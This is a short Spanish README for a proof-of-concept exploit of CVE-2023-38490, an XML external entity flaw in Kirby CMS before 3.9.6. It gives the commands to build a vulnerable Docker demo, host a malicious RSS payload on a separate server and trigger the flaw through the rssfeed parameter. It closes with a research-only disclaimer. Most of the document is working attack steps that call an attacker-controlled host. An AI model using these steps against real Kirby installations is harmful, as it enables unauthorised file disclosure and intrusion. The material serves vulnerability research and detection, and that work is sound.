
Kirby < 3.9.6 exploit de entidad externa XML
Kirby < 3.9.6 Entidad Externa XML
Exploit para CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Construye y ejecuta la aplicación demo vulnerable:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Sirve el payload de demo:
Nota: elige una dirección de enlace a la que el contenedor docker pueda acceder.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Ejecuta el exploit:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
La función vulnerable está presente en Kirby Core pero no se usa por defecto en Kirby Core, Kirby StarterKit o Kirby PlainKit. Esto significa que la vulnerabilidad no te afectará en la configuración predeterminada, pero podría introducirse con desarrollo personalizado o instalando un plugin que use el toolkit afectado.
ACCEIS no promueve ni alienta ninguna actividad ilegal; todo el contenido proporcionado por este repositorio es solo con fines de investigación, educativos y de detección de amenazas.